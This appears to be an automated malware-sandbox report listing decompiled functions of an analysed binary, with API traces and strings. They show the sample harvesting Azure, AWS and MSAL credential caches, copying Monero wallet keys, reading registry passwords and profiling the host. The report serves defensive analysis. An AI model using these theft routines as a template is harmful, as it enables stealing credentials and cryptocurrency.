Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 3749127164-2509457195
Opcode ID: 13e767b93e4fd52ed7c88a4f67d11e8ebddd64c7291bab7ce306e024bcd99903
Instruction ID: bb5acdae8032d8d3ea0e997c636151ac63de9164cc7a3846888cf8b5119cbc3f
Opcode Fuzzy Hash: 13e767b93e4fd52ed7c88a4f67d11e8ebddd64c7291bab7ce306e024bcd99903
Instruction Fuzzy Hash: 61714171A10218EBEF14DFA4DC49BEE7778BF45700F508158F50A6B190DBB86A85CF92

Function 00775510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0077A820: lstrlen.KERNEL32(00764F05,?,?,00764F05,00780DDE), ref: 0077A82B
Part of subcall function 0077A820: lstrcpy.KERNEL32(00780DDE,00000000), ref: 0077A885

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00775644
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007756A1
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00775857

Part of subcall function 0077A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0077A7E6

Part of subcall function 007751F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00775228

Part of subcall function 0077A8A0: lstrcpy.KERNEL32(?,00780E17), ref: 0077A905

Part of subcall function 007752C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00775318
Part of subcall function 007752C0: lstrlen.KERNEL32(00000000), ref: 0077532F
Part of subcall function 007752C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00775364
Part of subcall function 007752C0: lstrlen.KERNEL32(00000000), ref: 00775383
Part of subcall function 007752C0: lstrlen.KERNEL32(00000000), ref: 007753AE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0077578B
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00775940
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00775A0C
Sleep.KERNEL32(0000EA60), ref: 00775A1B

Strings

ERROR, xrefs: 00775693
ERROR, xrefs: 00775932
ERROR, xrefs: 00775849
ERROR, xrefs: 00775636
ERROR, xrefs: 007759FE
ERROR, xrefs: 0077577D

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 507064821-2791005934
Opcode ID: eb77140d8e810f9fcb42ad1ddba717f1a9d74ffe3ac3e34d2cbcc7dac13ea521
Instruction ID: 1d17e6a8f55ff396b83a65c0f19676e6b717a762f48336cea5662ff931e7f46a
Opcode Fuzzy Hash: eb77140d8e810f9fcb42ad1ddba717f1a9d74ffe3ac3e34d2cbcc7dac13ea521
Instruction Fuzzy Hash: C8E12E71910108EBDF19FBB0DC5AAEE7378AF94380F50C528B51A56091EF786A19CB93

Function 00774D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00778DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00778E0B

lstrcat.KERNEL32(?,00000000), ref: 00774DB0
lstrcat.KERNEL32(?,\.azure\), ref: 00774DCD

Part of subcall function 00774910: wsprintfA.USER32 ref: 0077492C
Part of subcall function 00774910: FindFirstFileA.KERNEL32(?,?), ref: 00774943

lstrcat.KERNEL32(?,00000000), ref: 00774E3C
lstrcat.KERNEL32(?,\.aws\), ref: 00774E59

Part of subcall function 00774910: StrCmpCA.SHLWAPI(?,00780FDC), ref: 00774971
Part of subcall function 00774910: StrCmpCA.SHLWAPI(?,00780FE0), ref: 00774987
Part of subcall function 00774910: FindNextFileA.KERNEL32(000000FF,?), ref: 00774B7D
Part of subcall function 00774910: FindClose.KERNEL32(000000FF), ref: 00774B92

lstrcat.KERNEL32(?,00000000), ref: 00774EC8
lstrcat.KERNEL32(?,\.IdentityService\), ref: 00774EE5

Part of subcall function 00774910: wsprintfA.USER32 ref: 007749B0
Part of subcall function 00774910: StrCmpCA.SHLWAPI(?,007808D2), ref: 007749C5
Part of subcall function 00774910: wsprintfA.USER32 ref: 007749E2
Part of subcall function 00774910: PathMatchSpecA.SHLWAPI(?,?), ref: 00774A1E
Part of subcall function 00774910: lstrcat.KERNEL32(?,0125E968), ref: 00774A4A
Part of subcall function 00774910: lstrcat.KERNEL32(?,00780FF8), ref: 00774A5C
Part of subcall function 00774910: lstrcat.KERNEL32(?,?), ref: 00774A70
Part of subcall function 00774910: lstrcat.KERNEL32(?,00780FFC), ref: 00774A82
Part of subcall function 00774910: lstrcat.KERNEL32(?,?), ref: 00774A96
Part of subcall function 00774910: CopyFileA.KERNEL32(?,?,00000001), ref: 00774AAC
Part of subcall function 00774910: DeleteFileA.KERNEL32(?), ref: 00774B31

Strings

\.azure\, xrefs: 00774DC1
Azure\.aws, xrefs: 00774E5F
*.*, xrefs: 00774DD8
\.IdentityService\, xrefs: 00774ED9
*.*, xrefs: 00774E64
msal.cache, xrefs: 00774EF0
Azure\.IdentityService, xrefs: 00774EEB
\.aws\, xrefs: 00774E4D
Azure\.azure, xrefs: 00774DD3

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 949356159-974132213
Opcode ID: 7c9fb91987516d809dfee7c23e5032fd426d327859d4ddf37b431b01f729670e
Instruction ID: e97de6c146c61a777cd76079e9a93816016b331102bff80c0a3fa9f187b23060
Opcode Fuzzy Hash: 7c9fb91987516d809dfee7c23e5032fd426d327859d4ddf37b431b01f729670e
Instruction Fuzzy Hash: BB4186B9984204A7DB54F770DC4BFDD73389B64740F408454754A560C1EEB85BC99B92

Function 00761310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 007612A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 007612B4
Part of subcall function 007612A0: RtlAllocateHeap.NTDLL(00000000), ref: 007612BB
Part of subcall function 007612A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 007612D7
Part of subcall function 007612A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 007612F5
Part of subcall function 007612A0: RegCloseKey.ADVAPI32(?), ref: 007612FF

lstrcat.KERNEL32(?,00000000), ref: 0076134F
lstrlen.KERNEL32(?), ref: 0076135C
lstrcat.KERNEL32(?,.keys), ref: 00761377

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

Part of subcall function 0077A9B0: lstrlen.KERNEL32(?,01259048,?,\Monero\wallet.keys,00780E17), ref: 0077A9C5
Part of subcall function 0077A9B0: lstrcpy.KERNEL32(00000000), ref: 0077AA04
Part of subcall function 0077A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0077AA12

Part of subcall function 0077A8A0: lstrcpy.KERNEL32(?,00780E17), ref: 0077A905

Part of subcall function 00778B60: GetSystemTime.KERNEL32(00780E1A,0125AB00,007805AE,?,?,007613F9,?,0000001A,00780E1A,00000000,?,01259048,?,\Monero\wallet.keys,00780E17), ref: 00778B86

Part of subcall function 0077A920: lstrcpy.KERNEL32(00000000,?), ref: 0077A972
Part of subcall function 0077A920: lstrcat.KERNEL32(00000000), ref: 0077A982

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00761465

Part of subcall function 0077A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0077A7E6

Part of subcall function 007699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007699EC
Part of subcall function 007699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00769A11
Part of subcall function 007699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00769A31
Part of subcall function 007699C0: ReadFile.KERNEL32(000000FF,?,00000000,0076148F,00000000), ref: 00769A5A
Part of subcall function 007699C0: LocalFree.KERNEL32(0076148F), ref: 00769A90
Part of subcall function 007699C0: CloseHandle.KERNEL32(000000FF), ref: 00769A9A

DeleteFileA.KERNEL32(00000000), ref: 007614EF

Strings

SOFTWARE\monero-project\monero-core, xrefs: 00761335
wallet_path, xrefs: 00761330
.keys, xrefs: 0076136B
\Monero\wallet.keys, xrefs: 0076138D

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 3478931302-218353709
Opcode ID: 42f8c139132f52464f6dc4859ef645c0426855ac170c90a3fbffc4c74b25c9b3
Instruction ID: ae86f6cfb3ddb7151d1db02f2e54e666041f4f7b9fd813fc3ae3b81c2f2e4d33
Opcode Fuzzy Hash: 42f8c139132f52464f6dc4859ef645c0426855ac170c90a3fbffc4c74b25c9b3
Instruction Fuzzy Hash: 075144B1D50119A7DB55FB60DC99EEE737CAF54340F4081A8B60E62081EF386B85CF96

Function 00777500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00777542
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0077757F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00777603
RtlAllocateHeap.NTDLL(00000000), ref: 0077760A
wsprintfA.USER32 ref: 00777640

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

Strings

x, xrefs: 0077764D, 00777655, 0077761B, 00777623
\, xrefs: 00777560
:, xrefs: 0077755C
C, xrefs: 0077754C

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\$x
API String ID: 1544550907-3439096465
Opcode ID: eb710d57ac34e893449215115f4868047565acd7af10bb672a973dd5490e9a88
Instruction ID: 1cfa1bf7d2d4c8677c510c9a9d29696d7f01c63d5d1f13f48327757f67358c32
Opcode Fuzzy Hash: eb710d57ac34e893449215115f4868047565acd7af10bb672a973dd5490e9a88
Instruction Fuzzy Hash: 144182B1D04258EBDF14DF94DC89BEEBBB8EF08740F104199F509A7280D7786A44CBA6

Function 007675D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 007672D0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 0076733A
Part of subcall function 007672D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 007673B1
Part of subcall function 007672D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0076740D
Part of subcall function 007672D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00767452
Part of subcall function 007672D0: HeapFree.KERNEL32(00000000), ref: 00767459

lstrcat.KERNEL32(3594A020,007817FC), ref: 00767606
lstrcat.KERNEL32(3594A020,00000000), ref: 00767648
lstrcat.KERNEL32(3594A020, : ), ref: 0076765A
lstrcat.KERNEL32(3594A020,00000000), ref: 0076768F
lstrcat.KERNEL32(3594A020,00781804), ref: 007676A0
lstrcat.KERNEL32(3594A020,00000000), ref: 007676D3
lstrcat.KERNEL32(3594A020,00781808), ref: 007676ED
task.LIBCPMTD ref: 007676FB

Strings

: , xrefs: 0076764E

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
String ID: :
API String ID: 2677904052-3653984579
Opcode ID: fa0793536bcb5e851103020e9dc9793ed34197816ec1d61d4aac16ee5cbf8758
Instruction ID: 65e25a102e8799c77fae0d61071ecf062ee1802db3955ac5acd04d7d193b816e
Opcode Fuzzy Hash: fa0793536bcb5e851103020e9dc9793ed34197816ec1d61d4aac16ee5cbf8758
Instruction Fuzzy Hash: 98315C71914109DFCB48EBB8DC99DFE73B9BF45301B184118F502A7291DB3CA946DBA2

Function 00778100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0125DFD8,00000000,?,00780E2C,00000000,?,00000000), ref: 00778130
RtlAllocateHeap.NTDLL(00000000), ref: 00778137
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00778158
__aulldiv.LIBCMT ref: 00778172
__aulldiv.LIBCMT ref: 00778180
wsprintfA.USER32 ref: 007781AC

Strings

%d MB, xrefs: 007781A3
@, xrefs: 0077814D

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
